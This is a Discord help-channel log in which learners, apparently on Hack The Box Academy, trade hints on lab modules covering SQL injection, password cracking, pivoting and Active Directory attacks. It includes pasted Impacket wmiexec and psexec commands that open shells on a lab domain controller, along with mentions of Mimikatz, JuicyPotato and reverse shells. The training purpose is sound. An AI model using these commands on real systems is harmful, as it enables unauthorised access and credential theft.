limpid hemlock
#

Hey can some help be provided I'm doing the attacking sql databases section from attacking common services I managed to login using the given credentials in the beginning using msqlclient.py but I can't run any commands

minor stag
#

I'm enumerating for the contents of a table

soft cedar
#

Just dump it

minor stag
#

I'm trying to figure out the syntax for that. If I just put in the url and --batch and --dump it doesn't get the info I need

still rain
#

anyone know how can i install another linux on a device i bought tht already has linux and i dont know how to boot up a linux flash on that(ps:its a tv box)

soft cedar
minor stag
maiden field
#

I'm in the
Working with IDS/IPS
Skills Assessment - Snort

There is a file named wannamine.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the Overpass-the-hash technique which involves Kerberos encryption type downgrading. Replace XX with the appropriate value in the last content keyword of the rule with sid XXXXXXX within the local.rules file so that an alert is triggered as your answer.

I'm currently checking the wireshark traffic and looking for || TGS-REQ || i'm not sure if i'm searching for the good thing and even if I am I'm not sure to understand the best way to find the XX

soft cedar
limpid hemlock
#

In attacking sql databases part of attacking common services after 1 logs in using mssqlclient how to run queries in database I can't run any queries getting some error

fathom pendant
#

"getting some error"

#

please be more descriptive

#

"getting some error" doesn't provide us details as to what the error is

limpid hemlock
#

Could not find storedprocedure show when I ran show tables command

fathom pendant
#

because show tables isn't an mssql command

#

re-read the section for the mssql syntax

fathom pendant
#

it could also be under the SQLCMD syntax

#

the syntax you're using is for mysql, which has completely different syntax

clever topaz
#

for Password Attacks Lab - Hard section
i cant move the file via smb, is there any way i can export the keypass and sam file

#

i tried to change the access to 1 also not allowed

maiden field
fathom pendant
#

^

#

or transfer via other methods

#

for instance: xfreerdp has the /drive: option

clever topaz
#

but how can i insert the creds when moving file?
for example, move file \smb\

#

because they dont prompt for username and password

next bronze
#

it should ask for it during the operation if creds are needed

clever topaz
shut quest
clever topaz
#

ur my savior thanks

molten current
#

hey i was wondering, i was doing the "NETWORK ENUMERATION WITH NMAP "

and i reached this question :
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.

i got the flag and am sure its the flag, but it keeps telling me its wrong

#

is there anything off ?

#

oh sorry lol i got it

#

the one typing, if you are typing for me, thanks a lot

urban walrus
#

Hi, so I'm currently doing the "Windows Server" section of the "Windows Privilege Escalation" Path. I tried RDPing into the machine but for the life of me I can't do it. I scanned the box and RDP is open, I tried using evil-winrm because winrm is open but I can't use the creds provided. SO I thought maybe I should exploit the box even though creds have been provided, It looks like the box is susceptible to Eternalblue but I can't exploit for the life of me, tried logging in the smb shares(got nothing), tried accessing rpc and got nothing, could'n't browse anything. I've been on this module for 5-6 hours lol. I think I'm supposed to RDP into the machine because this section provided creds but then again, I tried about 5 rdp clients(xfreerdp, remmina etc) and I can't connect on all of them but when scanning with nmap the port is open lol. Oh and I have restarted the machine like 5 times, so I'm absolutely lost

cloud urchin
urban walrus
urban walrus
cloud urchin
#

can you show the command you're using please

#

have you tried from the pwnbox

urban walrus
urban walrus
cloud urchin
#

yeah just to rule out your computer you know

#

also was rdesktop in your 5 clients you tried

urban walrus
cloud urchin
#

yeah np. just do it from there on this one haha

urban walrus
cloud urchin
#

maybe the victim box despawned lol

shut quest
marsh echo
urban walrus
snow ridge
#

Module ADCS attacks, section ESC10. Why doesn't psexec print flag but wmiexec does?

└─$ KRB5CCNAME=Administrator.ccache wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type C:\Windows\System32\rbcd.txt
{FLAG}
C:\>exit
                                                                                                                                
┌──(kali㉿kali)-[/tmp]
└─$ KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass LAB-DC.LAB.LOCAL 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on LAB-DC.LAB.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file pepPLMKe.exe
[*] Opening SVCManager on LAB-DC.LAB.LOCAL.....
[*] Creating service rwYV on LAB-DC.LAB.LOCAL.....
[*] Starting service rwYV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3772]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> type C:\Windows\System32\rbcd.txt
The system cannot find the file specified.
cloud urchin
#

you sure that's the right path?

long quail
#

also check the access permissions

snow ridge
#

Yes, because I get the flag using different method and the question directly says the flag

#

Im just wondering why doesnt psexec give that

next bronze
#

windows wouldn't tell you "The system cannot find the file specified." if the file is there

cloud urchin
#

system32 is a weird place for the flag

next bronze
#

it's the problem is not with the shell

#

also what section and question

snow ridge
#

But the file exists in that location

cloud urchin
#

clearly it doesn't

snow ridge
#

ESC10, only question

#

Abuse ESC10 and Resource-Based Constrained Delegation to compromise the DC and submit the content of the flag C:\Windows\System32\rbcd.txt

snow ridge
#

I just removed the flag value for obv reasons

cloud urchin
#

k but a shell is a shell. and your command literally says "cannot find the file", so you're in the wrong location

snow ridge
#

Its a full path and other shell finds it and other doesnt

long quail
#

is there any redirections?

#

ur probably either have no file access permissions or its redirection issue

cloud urchin
#

also isn't it flag.txt not rbcd.txt?

snow ridge
#

@cloud urchin Abuse ESC10 and Resource-Based Constrained Delegation to compromise the DC and submit the content of the flag C:\Windows\System32\rbcd.txt
This is the question 😄

cloud urchin
#

alright

snow ridge
#

Would be nice if someone else can confirm this behavior

#

smbexec manages to print flag too

cloud urchin
#

no idea

onyx robin
#

hi guys! I have a problem...in module Using Web Proxies->Proxyng Tools i set the .conf file for proxychains, but once i try to run it with curl owasp zap don't capture anything, also with Metasploit.

#

I also added in owasp zap a HTTP proxy and modified the proxychains.conf but still don't work

onyx robin
cloud urchin
#

not sure, but i'd wager zap probably can do it

shut quest
marsh echo
#

i find the files but it takes 2 hours to crack and at the end there's nothing :/

next bronze
#

did you use the mutated list?

marsh echo
#

password.list ?

#

no i use rock you

fathom pendant
#

Use the mutated password list constructed from the mutated passwords section

crystal steeple
#

in file inclusion skill assessment , i found the admin panel and im trying to log poisin but the php payload won't work, i intercepted the request by burpsuite but its always blank, and when i assign ?cmd=id , the log breaks

marsh echo
#

can i mp someone to show him the manipe i made and the hash found?

fathom pendant
livid ether
#

guys, im a bit stuck in Footprinting - SMTP module, ive tried || smtp_user_enum command with more response timeout with some wordlists, metasaploit smtp_enum scanner, and nmap smtp_enum_users.nse || it gives a lot of users but none is correct, any info or advice?

late moth
#

finally done with the malware analysis module. Thank goodness

cloud urchin
#

Alright I give up, any tips on getting the .203 IP on Foothold DNS module? I've tried n0kovo, sortedcombined-dns-recon-fierce, bitqquark, top 11000. Kinda tired of waiting a million years for nothing.

shut quest
deep needle
#

Pivoting, Tunneling, and Port Forwarding
Skills Assessment

Q.3 Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

I know this is silly one but I cannot able to do ping sweep and cannot even able to get shell on my kali from web shell. I know I am missing something silly but not getting it.

got creds of mle*** and i am sensing to use it as xfreerdp (due to practice with all other section in module) but not sure how to do proxychains here

fathom pendant
shut quest
fathom pendant
#

The nse script is stupid imo, and requires you to research how to pass script args

marsh echo
deep needle
shut quest
dark garden
#

Hello. I am working on the module "Password attacks" and specifically doing the question related to the section "Password Mutations". I have created a password list and hydra is telling me that it will take 2 hours, which not so long (but not so short too). I am just wondering, when you are working on a box, do you generally try to do a bruteforce attack on the different services you enumerate? Or do you do it only when you are out of solutions?

deep needle
crystal steeple
#

I tried doing just the php payload but didn’t work, or rather the log crashes

dark garden
fathom pendant
#

Ssh is painfully slow

thorn urchin
#

unless you use ssb

#

then either you succeed or it dies

fathom pendant
#

Referring to available and mentioned tools ig

runic remnant
#

Im doing "Windows Privilege Escalation Skills Assessment - Part I" and Im trying to get juicypotato to run, im checking different clsids but im not sure if I gotta keep checking different ones or if my command is wrong

dim wolf
#

you could go caramelize onions before brute forcing ssh finishes

fathom pendant
#

Ssb tool goes brrr

dim wolf
#

i thought this tool's ascii art looked like a 🖕 for a second

fathom pendant
#

It very well could

crystal steeple
#

i lost 3hours due to this lmao

midnight coyote
#

Zodiac case vs the watcher case

strange forge
#

Hey, iam doing "attacking on sql databases" and finally got the mssqlsvc hash and password. when iam trying to login it says "mssql: login error: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication." any hints?

shut quest
shrewd hazel
#

SQLMap Essentials module. question "What's the contents of table flag5? (Case #5)" I get 2 different flags to appear somehow, but says they are both wrong

finite mist
#

can someone give me a nudge for ad enumeratinon & attack skills assessment part 2 q1?

lucid sluice
#

[*] Exploit completed, but no session was created.

why do i keep getting this error
i've copied and paste the exact same info apart from replacing the rhost and lhost (tun0)

mine is failling at the hightlighted

fathom pendant
inner orchid
#

is theres someone that knows what is this happening when i try to use mssqlclient.py? "[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]
"

fathom pendant
#

It looks like it's using ssl? Idk

inner orchid
#

yes, but, what does this mean? [('SSL routines', '', 'no protocols available')], i cannot login to the database

fathom pendant
#

It means it, for whatever reason, isn't detecting ssl maybe? Adding -v will be more verbose

next bronze
#

for impacket it's -debug

fathom pendant
#

Thx

next bronze
#

is your impacket version outdated? I've never seen problems with mssqlclient.py ssl, it should just switch without problems, try to update/reinstall it with pipx

inner orchid
#

its so weird!

cedar yew
#

or lazagne runing which windows

cedar yew
#

i try in my computer but not runing

deep bay
#

Magic byte is not required on there.

fathom pendant
next bronze
#

yeah ik, they're saying they tired and it doesn't run in win11

#

but it does

next bronze
deep bay
#

however, you will use the magic byte later on when after you successfully got the source code of upload.php

cedar yew
#

check with software publish vs vs

next bronze
#

?

cedar yew
#

can i send error png on dm

next bronze
#

read #welcome to get verified and you can send screenshots

cedar yew
fathom pendant
next bronze
#

definitely works in my own lab

cedar yew
#

my error- > this app cant run on your pc

to find a version for your pc, check with the software publisher

tight bane
#

Hello. @short gulch @red spruce @9twek
Hope you found answer for "how "advanced_ip_scanner.exe" was introduced to the compromised system"
Hint for others use examples from previous topic, find exploring USN. Go through findings, discord search :), note SIEM crucial thing 🙂 T__e
Then you need use USN example in current topic. I think it will be enough to find answer.

fathom pendant
cedar yew
#

nope i try in cmd

next bronze
#

download the latest version

cedar yew
#

yes tihs latest version

#

2.4.5

next bronze
fathom pendant
#

Either way: this strays from academy talk

#

And goes more into personal issues.

cedar yew
#

That's right, I just wanted to know if there is a problem with the tool.

fathom pendant
#

Sounds like an issue with your environment

#

Still not relevant though

cedar yew
#

true i will search

fathom pendant
#

As the tool is just referenced/lightly shown in a module

lethal widget
#

I've been struggling with the lab assignment for over a day now. The task description mentions that Johanna's account is accessible on numerous hosts, though the specifics of these hosts seem to change with each reset. It appears that using her password to access other hosts might not be the right approach. I've managed to discover Johanna's password and used RDP to connect to the specified host. However, I'm having trouble opening the contents of a file named|| L*.k||. I've attempted to decrypt it using various password lists, including a mutated one and rockyou, but haven't had any success. Could someone please suggest which wordlist I should try next?

shut quest
lethal widget
#

Fking module. I have serious grudge with this module now

shut quest
#

It gets better kek

lucid sluice
#

[*] Exploit completed, but no session was created.

why do i keep getting this error
i've copied and paste the exact same info apart from replacing the rhost and lhost (tun0)

mine is failling at the hightlighted

shut quest
marsh echo
#

I'm not putting the rest since it's a hash to find but I don't understand why I can't find the hash for it seems so easy to me.

shut quest
marsh echo
fathom pendant
marsh echo
#

yes but nothing

fathom pendant
#

and the password should be in the mutated wordlist

thorn urchin
#

are you using a fresh mutated list

fathom pendant
#

that line at the end of john is it's version of "exhausted"

marsh echo
thorn urchin
#

or are you using a cropped one as recommended from earlier sections

fathom pendant
#

this module reuses the mutated wordlist a LOT

#

general path to follow with this module: mutated list -> regular password list -> rockyou

marsh echo
#

I understand that this module forces us to see the notion of mutation.

fathom pendant
#

not just the notion

#

it's literally having you reuse that mutated password list basically every time you have to crack/bruteforce

#

except maybe like one time

marsh echo
#

it's true

fathom pendant
#

meaning don't stray from it unless forced to

shut quest
fathom pendant
#

always start with provided resources unless the section shows you explicitly otherwise

fathom pendant
shut quest
#

No its not in rockyou at all

lucid sluice
marsh echo
fathom pendant
#

also all of kira's mutated passwords are in the grander mutated_password list

#

so it's still the same resource

#

you need to get into the habit of properly naming your files; hashes.zip would imply to me it's a zip file that contains hashes, not a password hash for a password protected zip

fathom pendant
#

generally when I name my hashes i will do [username].hash(es) and output to a [username].cracked

fathom pendant
#

that way when i refer back to it in my notes/system I know where it is/what i'm looking for

marsh echo
fathom pendant
#

well yes; it's meaningful

heavy edge
#

damn this one made me think

marsh echo
#

same lol

fathom pendant
#

if you haven't solved it yet

heavy edge
#

i found it in history

fathom pendant
#

👍

heavy edge
#

but i didnt realize i needed to run 3.9 specifically

fathom pendant
#

ah yeah i think the venv on the labs is running 2.7 by default

#

whatever is symlinked to the /usr/bin/python directory

heavy edge
#

yeahhhhhhh i was running 3 over and over. then tried laz

#

and finally was like why not

fathom pendant
#

yeah sometimes being super specific helps

#

i think the change from 3.8 -> 3.9 changed a lot of things

#

and eventually there'll be another leap that breaks more

#

such is the way of languages

strange forge
#

pwn box is behaving weird. when i press any arrow key (side, top, bottom) it start displaying character such as (,&%' . is it tripped iam on the service enumeration module.

fathom pendant
#

Try disabling some extensions if you have any, it sounds like something is messing with it

onyx robin
#

hey! I still have problems with proxychains, i can't capture anything with owasp zap, but also seems that proxychains with curl (like in the Using Web Proxies->Proxying Tools module) does not work properly, i did all the things descibed, and i also looked for info on Google, maybe i lost a particualr setting in proxychains.conf?

#

by the way, owasp zap works fine with browsers and also with foxyproxy, i have problems only with proxychains, metasploit and nmap!

strange forge
onyx robin
fathom pendant
#

<@&861185840277487616> we do not do hacker for hire, read #rules

onyx robin
shut quest
onyx robin
lucid sluice
#

this is infuriating i dont know what else to do here

#

it authenticated but no session was created

shut quest
#

are you able to try it on pwnbox?

lucid sluice
#

same error on pwdboc

#

pwnbox*

shut quest
#

have you tried typing out all the commands instead of copy paste?

lucid sluice
#

i had to since pwnbox does not allow for copy and paste

#

ok i just did it again and it worked. Like what the hell! I put the exact same info. why is it working now! 😦

lucid sluice
strange forge
lucid sluice
old vector
#

So I’m on passwords module. I successfully got a few users and passwords and successfully connected to win10 machine found flag on desktop and am trying to paste it in the blank and it is not accepting the answer as being correct

#

Help pls

heavy edge
#

make sure there is no space before the flag

old vector
#

There is not

#

Or after

#

Anyone who has done this module and has this flag saved please message me so I can send you this and see if it’s the same. I do t understand how it can be worn it’s the only user that I can rdp with

#

Wrong not worn

heavy edge
#

you arent rdping

#

you are evil-winrming io believe

old vector
#

Xfreerdp

#

I used xfreerdp to connect

heavy edge
#

im 99% sure you need to winrm with the right user not the one that has rdp perms

old vector
#

Flag is on desktopyou are right crap that must be a different flag

grizzled schooner
#

On rev shells. Used the rev shell given by module as well as revshells.com - none of them are working, the powershell just throws me about a page full of errors... I've tried different ports as well as admin powershell, and disabled AV any ideas?

heavy edge
old vector
#

Ya I got em mixed around sorry

fathom pendant
#

While their creds may work for other services once you hit one they should be crossed off

fathom pendant
#

Since you already cracked one

old vector
#

I have all 4

#

Thanks guys I am tired worked all day but persistent just need sleep

#

Got two flags since you helped me

fathom pendant
#

For AD users there's other methods

#

But local- super helpful

lyric raft
#

I am in the module "modern web exploitation techniques", I was able to get the flag with the second order IDOR (whitebox), now I am writing a python script to automate the process, can someone who is in the same module and can help me with the script?

grizzled schooner
#

After a little bit of trouble shooting - worth noting that the rev shell htb gives you for that module will not work, they have it set up wrong

small sage
#

Stuck in the Intro to Digital Forensics module
"Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.exe"

I'm pretty sure I've identified || temp.bat || as the file that downloads advanced_ip_scanner.exe onto the system, so I'm trying to open the mft_data file into mft explorer to try and see whats inside the file and it just hangs and won't open. Am I at least on the right track?

unreal tapir
#

Hi

#

Does anyone know the website of the company EF from htb ctf?

small sage
small sage
# dim wolf check the USN journal again

uh so I opened the usn csv directly instead of filtering in ps like the module shows and I see a lot more but still don't think I'm on the right path
I see || trustedinstaller.exe ||, ||wmiprvse.exe || and || tiworker.exe || all downloading files right before an advanced.zip appears, but none of those worked

dim wolf
#

do you have it open in Timeline Explorer?

fading cairn
#

good evening, i'm new to the group and new to cybersecurity! can you give me a few suggestions to help me get started please!

compact patrolBOT
small sage
dim wolf
#

now search for what you're looking for

#

Ctrl+F

#

i might be stupid

small sage
#

I mean.. yes I've searched the advanced_ip..

dim wolf
#

you see the zip file

small sage
#

ya

dim wolf
#

there's something you can leverage to figure out how it got there

#

specifically event logs

crystal steeple
#

im stuck in the type filters section in file uploads module, i bypassed all filters, i successed in uploading files but i get this error, i tried multipe php allowed extensions but none worked

small sage
clever topaz
#

for Password Attacks Lab - Hard, i cant get the file in SMB, ive tried impacket, smbmap, smbclient on pwnbox and my own kali

#

i tried doing it on the target windows machine but keep state no file found

bold rivet
#

Hello

fast badger
#

hello

#

question : What is the type of the service of the "syslog.service"?

#

my input : systemctl list-units --type=service | grep syslog.service

clever topaz
next bronze
#

looks like a connection issue, impacket's smbclient also times out?

clever topaz
#

yes

#

by looking through the chat i realised a lot ppl have this issue too

fathom prairie
#

I need help with Password Attacks, Protected Files

#

This question
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

#

I have no idea what "cracked password" they are talking about

#

for Kira

next bronze
#

you've cracked their password in the previous section, use that

hot grove
#

everyone elses target machines spawning in a timely fashion? cuz mine has been spawning for quite some time even after refreshing

fast badger
#

why are you ignoring my question , someone should please help

#

question : What is the type of the service of the "syslog.service"?

hot grove
#

have you tried i think, 'sytemctl status syslog.service'

#

*system

faint monolith
#

Help needed for Analyzing Evil With Sysmon & Event Logs module in SOC Analyst Path
question is Replicate the Unmanaged PowerShell attack described in this section and provide the SHA256 hash of clrjit.dll that spoolsv.exe will load as your answer. "C:\Tools\Sysmon" and "C:\Tools\PSInject" on the spawned target contain everything you need.

i've followed the "attack" exactly but did not see spoolsv turn managed and no event id 7 seen in sysmon logs..

fathom prairie
grand portal
#

been stuck at it.

clever topaz
#

its fast

fathom prairie
#

Its not gonna be the one where i have to wait for the

#

thing to crack right

clever topaz
#

it is

#

idk but for me the process only take like 2 min or smtg

fathom prairie
#

O lord up above my comoputer is slow so it takes lik an hour to crack things

clever topaz
#

use pwnbox

fathom prairie
#

ok ty for the link tho

next bronze
#

mutate loveyou and bruteforce with the list, I think it was mentioned in a hint of an earlier section

faint monolith
#

i just got the answer to this. the question actually wants you to locate clrjit.dll used by spoolsv.exe
so what you need to do is to open the properties of spoolsv using process hacker, locate clrjit.dll, rightclick and go to file location.
use certutil to generate the hash

clever topaz
#

can i mount a smb?

next bronze
#

mount -t cifs -o username=<user> //<ip>/<share> /mount/point

#

you can set the timeout for smbclient too

clever topaz
#

i cant get the file

next bronze
#

dm the password for that user, I'll take a look

crystal steeple
#

hello i need help in file upload skills assessment, i bypassed whitelist and blacklist filter, found uploads directory

#

the only think i cant bypass is the content header

#

i tried adding the file signature of jpeg : ÿØÿî

#

but still got : only images allowed error

next bronze
#

you probably need to edit the hex values to get the magic bytes right but iirc there's another image type that you can use

limber river
limber river
crystal steeple
limber river
next bronze
#

it's in burp

heavy edge
#

shadow and passwd.bak are NOT supposed to be the same contents right?

crystal steeple
#

none worked :/

crystal steeple
#

still didnt work too

limber river
heavy edge
#

so the lab iswonky? because these are the bak files of the shadow and pass found under will

limber river
heavy edge
#

yeah thats what it looks like but they are under the name shadow.bak and passwd.bak

limber river
grand portal
#

Malware analysis, dw i completed it.

crystal steeple
#

Damn i turned off my pc now imma try it tomorrow :3

#

But ig i already tried it, maybe i used with wrong extension before hmm we shall see

rancid aspen
spring granite
#

Hello, I am having issues with the Analyzing Evil With Sysmon & Event Logs section of the Windows Event Logs & Finding Evil module. My issue is with the 3 question "Replicate the Credential Dumping attack described in this section and provide the NTLM hash of the Administrator user as your answer." So when I run Mimikatz and dump the password, i go to sysmon and search for event ID 10 and cant find anything with that ID. Is anyone able to assist?

tranquil axle
spring granite
#

Right, I misspoke because i got the answerer but I guess i wanted to see the process too but maybe it doesn't show up in the lab environment.

#

Just kinda bugged me I couldn't find it lol. Thank you though 🙂

tranquil axle
#

For sysmon to log anything it needs to be configured and activated, it may very well be that that didn’t happen in the lab?

spring granite
#

@tranquil axle Very well could have, I only messed with the configurations to see ID 7 so must have overlooked ID 10

wise vault
#

Hi everyone

#

can someone help me with the module of active directory enum and attack i stuck on one question from the section Privileged access

#

What other user in the domain has CanPSRemote rights to a host?

#

its really confusing

next bronze
#

you can use bloodhound

wise vault
#

how

#

i opened it in rdp ms01 host

#

but its showing not any domain

#

data

next bronze
#

check the ACL Enumeration section

wise vault
#

can you make it clear to me

autumn pilot
#

He already did, use bloodhound as he suggested

wise vault
wise vault
wise vault
green smelt
#

INTRODUCTION TO DIGITAL FORENSICS - Skills Assessment

Q4 : Determine the folder that contains all Mimikatz-related files and enter the full path as your answer.

Anyone can help me this :< or hint to figure it out

merry tusk
#

Hi All, need a solution or link for this task, Exploit the vulnerability and obtain the admin’s command history as Proof of Concept (PoC). for
Linux Ubuntu 4.14.252-195.483.amzn2.x86_64 #1 SMP Mon Nov 1 20:58:46 UTC 2021 x86_64 GNU/Linux, any idea where I can get it, I would be very apricated for any help

minor stag
#

I don't understand what I'm doing wrong.

next bronze
#

make sure there's no extra space at the start or end

#

and what module and section

minor stag
#

SQLMap Essentials/Attack Tuning

#

No spaces on either end

next bronze
#

what's the first and last character in the curly braces

minor stag
#

7 is first and last

next bronze
#

that should be right, did you copy the whole thing

minor stag
#

I did

next bronze
#

refresh the page

minor stag
#

Still doesn't want to accept it

next bronze
#

dm me the flag

latent frigate
#

Can someone give me a help with the module "Crackmapexec - Vulnerability Scan Modules"

  1. The first goal was to detect an internal network . The flag of the first question says that we need proxychains for that
  2. With chisel it was possible to connect to the network: 172.16.10.5.
  3. The next question says that we need to find a vulnerability and get the flag of Desktop of the Domain Controllers Adm.

Here in 3 comes the problem. I dont know if i got the question right. The user given for the activity is already administrator. so what else do we need?

barren root
#

Try getting the flag. If it works it works

#

Some other labs have a similar thing where one user given can already get a flag from another exercise which you re supposed to get from a lower priv user

#

shrug recycling machines backfires

fringe urchin
#

or did you already fix it?

minor stag
#

I got three different results from the same command and the third was finally the correct one

fringe urchin
#

kekw lol

brazen saffron
brazen saffron
#

I tried as well before;

#

I 'll do it again to be sure;

minor stag
#

And you ran ffuf against it?

brazen saffron
fringe urchin
brazen saffron
#

?

fringe urchin
#

and you are left with every page that doesnt have a installation page. where you can search again

#

there is a lot of subdomains maybe you legit didnt see any?

brazen saffron
fringe urchin
#

example. app. is different from the rest

brazen saffron
minor stag
#

Run ffuf against it, figure out what code the errors are generating, say 612, ctrl+c it and add -fs 612

brazen saffron
#

?

fringe urchin
#

not correct wordlist

brazen saffron
#

Well namelist from sec?

fringe urchin
#

yea but thats not namelist is it?

brazen saffron
#

But how to "select" only under < 1000 (about size)?

fringe urchin
#

/opt/vhosts?

brazen saffron
fringe urchin
fringe urchin
brazen saffron
#

I know but...

fringe urchin
brazen saffron
#

I have more than 200.

fringe urchin
brazen saffron
#

?

#

-fs 612: Filter responses with a size of 612, default response size in this case.